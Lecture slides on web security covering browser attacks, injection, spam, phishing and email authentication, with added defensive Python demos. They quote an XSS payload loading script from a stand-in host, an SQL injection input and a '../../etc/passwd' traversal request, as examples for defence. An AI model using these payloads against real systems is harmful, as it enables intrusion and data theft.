System & Software Security Unit 2

The document discusses security issues related to web browsers. It covers various types of attacks targeting browsers like man-in-the-browser, keystroke loggers and fake websites. It also explains injection attacks, spam, phishing and how to protect against these threats.

Uploaded by

Warad Jaiswal

Security in Computing

Chapter 2: The Web

Chapter 2 Objectives
• Attacks against browsers
• Fake and malicious websites
• Attacks targeting sensitive data
• Injection attacks
• Spam
• Phishing attacks

Introduction
Browsers are the software most users perceive as the gateway to the Internet.
Security issues for browsers arise from several complications to that simple description, such as these:
• A browser often connects to more than the one address shown in the browser’s address bar.
• Fetching data can entail accesses to numerous locations to obtain pictures, audio content,
and other linked content.
• Browser software can be malicious or can be corrupted to acquire malicious functionality.
• Popular browsers support add-ins, extra code to add new features to the browser, but these
add-ins themselves can include corrupting code.
• Data display involves a rich command set that controls rendering, positioning, motion,
layering, and even invisibility.
• The browser can access any data on a user’s computer (subject to access control restrictions);
generally the browser runs with the same privileges as the user.
• Data transfers to and from the user are invisible, meaning they occur without the user’s
knowledge or explicit permission.
On a local computer you might constrain a spreadsheet program so it can access files in only
certain directories. Unfortunately, none of these limitations are applicable to browsers.

Browser Vulnerabilities

Web Surfing Process
Consider the surfing process when we use any web application, such as internet banking.

Web Surfing for a Web Application

In this system, the LAN contains the application server and the database server, which accept
only inputs within the expected bounds. In front of the LAN sits the internal firewall, in front
of that the DMZ (demilitarized zone), and in front of that the external firewall. An attacker who
wants to attack the website must first get through the external firewall and the DMZ. At that
layer the system administrator can review the logs, see what changes are appearing in the inputs
and what kind of attack is being attempted, analyse it and stop it, so that the malicious input
never passes through the internal firewall.
Looking at the diagram, the right-hand side is quite secure, with the internal firewall, external
firewall and DMZ as defence mechanisms, whereas on the left-hand side, the user's browser, there
is no such defence except the antivirus on the system. Antivirus software is signature based: it
can detect an attack only if that attack's signature is stored in it. Hence attackers shift their
target from attacking the website or web application to attacking the web browser.

Browser Attack Types
• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

Man-in-the-Browser

Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a
USB port or can masquerade as a
keyboard
• May also be installed as malware
• Not limited to browsers

Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

Program Download Substitution
• Attacker creates a page with seemingly
innocuous and desirable programs for
download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

User-in-the-Middle
Using click-bait to trick users into solving
CAPTCHAs on spammers’ behalf

Successful Authentication
The attacks listed above are largely failures of
authentication
Can be mitigated with
• Shared secret
• One-time password
• Out-of-band communication

Fake Website

Fake Code

Tracking Bug

Clickjacking

Drive-By Download
• Code is downloaded, installed, and executed on a
computer without the user’s knowledge
• May be the result of clickjacking, fake code, program
download substitution, etc.

Cross-Site Scripting (XSS)
• Tricking a client or server into executing scripted code
by including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like
user inputs, so they can take over web pages similarly
to the way buffer overflow attacks can take over
programs

Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>

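An added example, not from the slides, showing the injected comment above rendered by a vulnerable page template and by a hardened one. badsite.com is the slide's own placeholder host; the renderer and helper names are assumptions for the demonstration.

```python
import html

# Constructed sample: the comment from the slide, carrying an injected <script> tag.
INJECTED_COMMENT = (
    "Cool<br>story.<br>KCTVBigFan"
    "<script src=http://badsite.com/xss.js></script>"
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the comment is pasted straight into the page markup, so the
    browser parses the attacker's <script> tag as part of the page."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened: every HTML-significant character is escaped, so the browser
    displays the text literally and never executes it (the <br> tags are lost too)."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_comment_allow_br(comment: str) -> str:
    """Escape everything, then re-enable only the one harmless tag the site wants
    (an allow-list), rather than trying to filter out the dangerous ones."""
    escaped = html.escape(comment, quote=True).replace("&lt;br&gt;", "<br>")
    return f"<div class='comment'>{escaped}</div>"


def contains_live_script(markup: str) -> bool:
    """Detection helper for rendered output: is there an unescaped <script tag left?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for renderer in (render_comment_unsafe, render_comment_safe, render_comment_allow_br):
        out = renderer(INJECTED_COMMENT)
        print(f"{renderer.__name__}: script would execute? {contains_live_script(out)}")
```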
SQL Injection
Injecting SQL code into an exchange between an application and its database
server
Example:
• Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input
field:
  QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + "';"
• The same query with malicious user input:
  QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1';"

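An added example, not from the slides, running the concatenated query above and its parameterised replacement against a constructed in-memory copy of the trans table; the table contents and function names are assumptions.

```python
import sqlite3

INJECTED_ACCT = "2468' OR '1'='1"   # the malicious input shown on the slide


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the 'trans' table on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trans (acct TEXT, amount INTEGER)")
    conn.executemany(
        "INSERT INTO trans VALUES (?, ?)",
        [("2468", 100), ("2468", 250), ("1357", 999), ("9999", 5)],
    )
    return conn


def fetch_transactions_vulnerable(conn: sqlite3.Connection, acct_num: str) -> list:
    """The slide's pattern: the query is built by string concatenation, so a quote
    in acct_num closes the literal and the rest of the input becomes SQL."""
    query = "SELECT * FROM trans WHERE acct = '" + acct_num + "';"
    return conn.execute(query).fetchall()


def fetch_transactions_safe(conn: sqlite3.Connection, acct_num: str) -> list:
    """Hardened: acct_num is bound as a parameter, so the driver treats it purely
    as data and the WHERE clause keeps its intended shape."""
    return conn.execute("SELECT * FROM trans WHERE acct = ?", (acct_num,)).fetchall()


def row_counts() -> dict:
    """Run both versions against a legitimate account number and the injected one."""
    conn = build_demo_db()
    return {
        "vulnerable_legit": len(fetch_transactions_vulnerable(conn, "2468")),
        "vulnerable_injected": len(fetch_transactions_vulnerable(conn, INJECTED_ACCT)),
        "safe_legit": len(fetch_transactions_safe(conn, "2468")),
        "safe_injected": len(fetch_transactions_safe(conn, INJECTED_ACCT)),
    }


if __name__ == "__main__":
    # The injected input makes the vulnerable query return every row in the table.
    print(row_counts())
```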
Dot-Dot-Slash
• Also known as “directory traversal,” this is when
attackers use the term “../” to access files that are on
the target web server but not meant to be accessed
from outside
• Most commonly entered into the URL bar but may also
be combined with other attacks, such as XSS

Server-Side Include (SSI)
• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable
to allowing users to execute SSI directives through text
input

Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures”

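An added example, not from the slides, for the dot-dot-slash section and the countermeasures above: a file-serving check that decodes every encoding of "../" and then decides on the resolved path rather than by pattern-matching the input. The web root /var/www/site and the function names are assumptions.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Assumed web root for the example (the slides name none); it need not exist on disk.
WEB_ROOT = Path("/var/www/site").resolve()


def normalise_request_path(raw: str, max_decodes: int = 3) -> str:
    """Percent-decode until the value stops changing, so that '%2e%2e%2f' and the
    double-encoded '%252e%252e%252f' are both seen as '../' (the slide's rule:
    account for every potentially valid encoding). Backslashes are treated as
    separators too, as Windows servers would."""
    current = raw
    for _ in range(max_decodes):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/")


def resolve_under_root(raw: str, root: Path = WEB_ROOT) -> Optional[Path]:
    """Return the file the request maps to if it stays inside the web root, else None.
    The decision is made on the fully resolved path rather than by searching for
    '../', so any spelling of the traversal sequence is caught the same way."""
    relative = normalise_request_path(raw).lstrip("/")
    candidate = (root / relative).resolve()
    try:
        candidate.relative_to(root)   # raises ValueError when candidate escaped root
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    for request in ("images/logo.png", "../../etc/passwd", "%252e%252e%252fetc%252fpasswd"):
        print(f"{request!r} -> {resolve_under_root(request)}")
```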
Email Spam
Experts estimate that 60% to 90% of all email is spam
Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites

Spam countermeasures
• Laws against spam exist but are generally ineffective
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make spammers’
jobs more difficult
What is email spoofing?
• One reason email attacks succeed is that the headers
on email are easy to spoof, and thus recipients believe
the email has come from a safe source.
• In email spoofing, an attacker uses an email header to
mask their own identity and impersonate a legitimate
sender. (An email header is a code snippet that contains
important details about the message such as the
sender, the recipient, and tracking data.)

How to protect against email spoofing
• Be wary of messages encouraging action quickly or
urgently
• Inspect email headers
• Use software that filters spoofed messages
• Domain owners can also take action to prevent
attackers from sending messages from their domain. To
do so, organizations can create Domain Name System
(DNS) records specifically for authentication. These
include:
• SPF records
• DKIM records
• DMARC records
Phishing
Phishing – Cybercriminal attempts to steal personal and financial information or infect
computers and other devices with malware and viruses
• Designed to trick you into clicking a link or providing personal or financial information
• Often in the form of emails and websites
• May appear to come from legitimate companies, organizations or known individuals
• Take advantage of natural disasters, epidemics, health scares, political elections or timely
events

Different forms such as:

• Mass Phishing – Mass, large-volume attack intended to reach as many people as possible
• Whaling – Type of spear phishing attack that targets “big fish,” including high-profile
individuals or those with a great deal of authority or access
• Clone Phishing – Spoofed copy of a legitimate and previously delivered email, with
original attachments or hyperlinks replaced with malicious versions, which is sent from a
forged email address so it appears to come from the original sender or another legitimate
source
• Advance-Fee Scam: Requests the target to send money or bank account information to
the cybercriminal
• And spear phishing, covered next
Spear Phishing
• Spear phishing is on the rise because it works. Traditional security defences do not detect and stop it.

• From a cyber criminal’s point of view, spear phishing is the perfect vehicle for a broad array of damaging
exploits.

• Threat actors are increasingly targeting executives and other high-level employees, tricking them into
activating malware that gives criminals access into their companies’ environments.

• This might be ransomware that encrypts company data, then extorts fees from the victim to remediate the
situation. Targeted executives are usually key leaders with titles such as chief financial officer, head of
finance, senior vice president and director.

• Spear phishing emails tend to have enough detail to fool even experienced security professionals.

• A phishing campaign may blanket an entire database of email addresses, but spear phishing targets
specific individuals within specific organizations with a specific mission.

• By mining social networks for personal information, an attacker can write emails that are extremely
accurate and compelling.

• Once the target clicks on a link or opens an attachment, the attacker establishes a foothold in the network,
enabling them to complete their illicit mission.

• 84% of organizations said a spear-phishing attack successfully penetrated their organization in 2015
Common Baiting Tactics

• Notification from a help desk or system administrator
  Asks you to take action to resolve an issue with your account (e.g., your email account has reached its
  storage limit), which often includes clicking on a link and providing requested information.

• Advertisement for immediate weight loss, hair growth or fitness prowess
  Serves as a ploy to get you to click on a link that will infect your computer or mobile device with
  malware or viruses.

• Attachment labeled “invoice” or “shipping order”
  Contains malware that can infect your computer or mobile device if opened. May contain what is known
  as “ransomware,” a type of malware that will delete all files unless you pay a specified sum of money.

• Notification from what appears to be a credit card company
  Indicates someone has made an unauthorized transaction on your account. If you click the link to log
  in to verify the transaction, your username and password are collected by the scammer.

• Fake account on a social media site
  Mimics a legitimate person, business or organization. May also appear in the form of an online game,
  quiz or survey designed to collect information from your account.
Phishing Lure
• Often makes it look like a problem with one of your accounts
• Or tries to take advantage of an ongoing humanitarian crisis
Can you detect a phishing scam?
Common Phishing Scam Subject Lines
Barracuda Networks researchers compiled a list of the top 12 most common subject lines
used in phishing emails targeting businesses.
Researchers analyzed over 360,000 phishing emails and found that the most common subject
line used in attacks is simply ‘Request’, accounting for over a third of all the phishing
messages analyzed.

The report found the top 12 subject lines were as follows:


1. Request
2. Follow up
3. Urgent/Important
4. Are you available?/Are you at your desk?
5. Payment Status
6. Hello
7. Purchase
8. Invoice Due
9. Re:
10. Direct Deposit
11. Expenses
12. Payroll
Spear Phishing Characteristics
A spear-phishing attack can display one or more of the following characteristics:

• Blended or multi-vector threat. Spear phishing uses a blend of email spoofing, dynamic
URLs and drive-by downloads to bypass traditional defenses.

• Use of zero-day vulnerabilities. Advanced spear-phishing attacks leverage zero-day
vulnerabilities in browsers, plug-ins and desktop applications to compromise systems.

• Multi-stage attack. The initial exploit of systems is the first stage of an APT attack that
involves further stages of malware outbound communications, binary downloads and
data exfiltration.

• Well-crafted email forgeries. Spear-phishing email threats are usually targeted to
individuals, so they don’t bear much resemblance to the high-volume, broadcast spam
that floods the Internet. This means traditional reputation and spam filters routinely miss
these messages, rendering traditional email protections ineffective.
How to protect against phishing
STOP. THINK. CONNECT.
• Before you click, look for common baiting tactics, e.g. requests for personal information, announcements
indicating you have won a prize or lottery, or requests for donations
• Look for spelling errors (e.g., “pessward”), lack of punctuation or poor grammar
• Hyperlinked URL differs from the one displayed, or it is hidden
• Threatening language that calls for immediate action

Install and maintain antivirus software on your electronic devices

Use email filters to reduce spam and malicious traffic

Be wary of messages asking for passwords or other personal information
• Reputable businesses and organizations will never ask for your password via email

Never send passwords, bank account numbers or other private information in an email
• Do not reply to requests for this information
• Verify by contacting the company or individual, but do not use the contact information included in the message

Do not click on any hyperlinks in the email
• Use your mouse to hover over each link to verify its actual destination, even if the message appears to be
from a trusted source
• Pay attention to the URL and look for a variation in spelling or a different domain (e.g., ulster.ac vs. ulster.com)
• Consider navigating to familiar sites on your own instead of using links within messages

Examine websites closely
• Malicious websites may look identical to legitimate sites
• Look for “https://” or a lock icon in the address bar before entering any sensitive information on a website
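An added example, not from the slides, that automates the "hyperlinked URL differs from the one displayed" check above on an HTML email body, so a mail filter can flag such links before a user has to hover over them. The message body is constructed; ulster.ac and ulster.com are the slide's own example domains, and the class and function names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message body: the first link's visible text names one domain
# while its real href points to another; the second link is honest.
SAMPLE_BODY = """
<p>Your account has reached its storage limit.</p>
<p>Log in at <a href="http://ulster.com/login">https://www.ulster.ac/login</a>
to resolve the issue.</p>
<p>Help: <a href="https://www.ulster.ac/help">https://www.ulster.ac/help</a></p>
"""

class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML email body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()

def org_domain(host: str) -> str:
    """Crude organisational-domain comparison on the last two labels (no public
    suffix list), so www.ulster.ac and ulster.ac count as the same site."""
    return ".".join(host.split(".")[-2:])

def find_deceptive_links(body: str) -> list:
    """Return the hrefs whose visible text looks like a URL on a different domain:
    the 'hyperlinked URL differs from the one displayed' check, done by the
    mail filter instead of by the user hovering over each link."""
    collector = LinkCollector()
    collector.feed(body)
    flagged = []
    for href, text in collector.links:
        shown_host = host_of(text) if "://" in text else ""
        if shown_host and org_domain(shown_host) != org_domain(host_of(href)):
            flagged.append(href)
    return flagged
```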
Best Practice for companies - DMARC
Organisations should set up DMARC which is Domain-based Message
Authentication, Reporting and Conformance email standard that:
1. confirms the sender’s identity using Sender Policy Framework (SPF) and DomainKeys
Identified Mail (DKIM)
2. tells the recipient’s email service what to do with emails that fail the check
3. asks recipient email services to provide reports of where email comes from

The benefits of DMARC are:

• Protecting your users, employees and reputation from cybercrime
• Reducing customer support costs relating to email fraud
• Improving trust in the emails your organisation sends
• Seeing the legitimate and fraudulent use of your domains via DMARC reports
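An added example, not from the slides, showing how a receiving mail service applies steps 1 and 2 above: it parses the domain owner's DMARC record, checks whether the SPF or DKIM result aligns with the From: domain, and otherwise applies the published policy. The DMARC record, example.org and the function names are constructed assumptions; spf_pass_domain and dkim_pass_domain stand for the domains the receiver's own SPF and DKIM checks reported as passing.

```python
from typing import Optional

# Constructed DMARC record for an assumed domain example.org (placeholder values).
SAMPLE_RECORD = "v=DMARC1; p=quarantine; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.org"


def parse_dmarc_record(txt: str) -> dict:
    """Split a DMARC TXT record into its tag=value pairs."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def org_domain(domain: str) -> str:
    """Crude organisational domain: the last two labels (no public suffix list)."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], mode: str) -> bool:
    """Identifier alignment: strict ('s') needs the authenticated domain to equal the
    From: domain exactly; relaxed ('r') accepts the same organisational domain.
    auth_domain is None when that mechanism did not pass at all."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_disposition(record_txt: str, from_domain: str,
                      spf_pass_domain: Optional[str], dkim_pass_domain: Optional[str]) -> str:
    """Steps 1 and 2 on the slide: the message passes if SPF or DKIM verified a
    domain that aligns with the From: header; otherwise the p= tag tells the
    receiver what to do (none, quarantine or reject)."""
    rec = parse_dmarc_record(record_txt)
    spf_ok = aligned(from_domain, spf_pass_domain, rec.get("aspf", "r"))
    dkim_ok = aligned(from_domain, dkim_pass_domain, rec.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass"
    return rec.get("p", "none")


if __name__ == "__main__":
    # Spoofed message: neither SPF nor DKIM passed for any domain.
    print(dmarc_disposition(SAMPLE_RECORD, "example.org", None, None))
```

The pct=, sp= and subdomain-policy lookups of the standard are left out so the alignment and policy logic stay visible.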
Multi-layered approach
PGP (Pretty Good Privacy)
It was invented by Phil Zimmermann in 1991. PGP addresses the key distribution problem
with what is called a “ring of trust” or a user’s “keyring.” One user directly gives a public
key to another, or the second user fetches the first’s public key from a server. And one
person can give a second person’s key to a third (and a fourth, and so on).
The PGP processing performs some or all of the following actions, depending on whether
confidentiality, integrity, authenticity, or some combination of these is selected:
• Create a random session key for a symmetric algorithm.
• Encrypt the message, using the session key (for message confidentiality).
• Encrypt the session key under the recipient’s public key.
• Generate a message digest or hash of the message; sign the hash by encrypting
it with the sender’s private key (for message integrity and authenticity).
• Attach the encrypted session key to the encrypted message and digest.
• Transmit the message to the recipient.

The recipient reverses these steps to retrieve and validate the message content.

S/MIME (Secure Multipurpose Internet Mail
Extensions)
An Internet standard governs how email is sent and received. The general
MIME specification defines the format and handling of email attachments.
The principal difference between S/MIME and PGP is the method of key
exchange. Basic PGP depends on each user’s exchanging keys with all
potential recipients and establishing a ring of trusted recipients; it also
requires establishing a degree of trust in the authenticity of the keys for
those recipients. S/MIME uses hierarchically validated certificates, usually
represented in X.509 format, for key exchange.
